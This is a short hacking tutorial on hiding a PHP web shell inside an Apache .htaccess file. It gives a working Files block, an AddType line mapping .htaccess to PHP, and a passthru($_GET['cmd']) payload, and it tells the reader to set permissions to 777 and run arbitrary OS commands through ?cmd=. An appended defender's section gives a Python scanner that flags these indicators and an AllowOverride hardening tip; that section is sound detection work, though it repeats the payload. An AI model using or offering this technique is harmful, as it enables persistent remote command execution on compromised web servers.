
How to hide your shell using .htaccess

Today I want to show you a lesser-known trick: the .htaccess file already present on the server can be used as a shell to execute OS commands. Just follow the simple steps described below. This file is also useful for adding restrictions on files.

Open your PHP web shell, navigate to the public_html directory and look for the .htaccess file. Once you have found it, click the edit option.

After clicking the edit option, add the following lines to your .htaccess file.


<Files ~ "^\.ht">
Order allow,deny
Allow from all
AddType application/x-httpd-php .htaccess
# <?php passthru($_GET['cmd']); ?>

After adding the code, save the file and you are done!

Sometimes, though, we are not able to edit the .htaccess file because of the permissions set by the administrator, so we have to change them.

If we get the error: .htaccess is not readable
then use the following command to make the file readable, writable and executable.
command: chmod 777 .htaccess

In the above command we can see 777. The first digit (7) is for the user, the second (7) for the group and the third (7) for others. In UNIX/Linux, permissions are divided into three categories: User, Group and Others.

Now in order to use your .htaccess shell

After ?cmd= you can execute any OS command of your choice.
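
A defender's check for the indicators described on this page, added here as an example (not code from the original post): it scans a web root for .htaccess files that are mapped to a PHP handler, contain a PHP open tag, re-open HTTP access to .ht* files, or are world-writable. The rule names and function names are this example's own.

```python
import os, re, stat, tempfile

# Rule names are this example's own; the patterns follow the snippet above.
RULES = {
    "php-handler-on-htaccess": re.compile(
        r"^[ \t]*(?:AddType|AddHandler)[ \t]+\S*php\S*[ \t]+.*\.htaccess\b",
        re.I | re.M),
    # PHP open tag inside a config file (hidden behind '#' on the page)
    "embedded-php-code": re.compile(r"<\?php", re.I),
    # <Files> block that re-opens HTTP access to .ht* files
    "ht-files-exposed": re.compile(
        r"<Files[^>\n]*\.ht[^>\n]*>[^<]*?"
        r"(?:Allow[ \t]+from[ \t]+all|Require[ \t]+all[ \t]+granted)", re.I),
}

def check_htaccess(path):
    """Return the sorted rule names that fire for one .htaccess file."""
    with open(path, "r", errors="replace") as fh:
        text = fh.read()
    hits = [name for name, rx in RULES.items() if rx.search(text)]
    if os.stat(path).st_mode & stat.S_IWOTH:  # e.g. after chmod 777
        hits.append("world-writable")
    return sorted(hits)

def scan_webroot(root):
    """Walk a web root; map each flagged .htaccess path to its findings."""
    paths = (os.path.join(d, ".htaccess")
             for d, _dirs, files in os.walk(root) if ".htaccess" in files)
    found = ((p, check_htaccess(p)) for p in paths)
    return {p: hits for p, hits in found if hits}

# Constructed sample: the lines from this page as they would sit on disk.
SAMPLE = r'''<Files ~ "^\.ht">
Order allow,deny
Allow from all
AddType application/x-httpd-php .htaccess
# <?php passthru($_GET['cmd']); ?>
'''

def demo():
    with tempfile.TemporaryDirectory() as root:
        path = os.path.join(root, ".htaccess")
        with open(path, "w") as fh:
            fh.write(SAMPLE)
        os.chmod(path, 0o777)  # the mode the page sets
        return scan_webroot(root)[path]

if __name__ == "__main__":
    print(demo())
```

On the server side, `AllowOverride None` (or an AllowOverride list without FileInfo) in the main configuration keeps an `AddType` line in .htaccess from being honoured.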

Source: HackTheDevil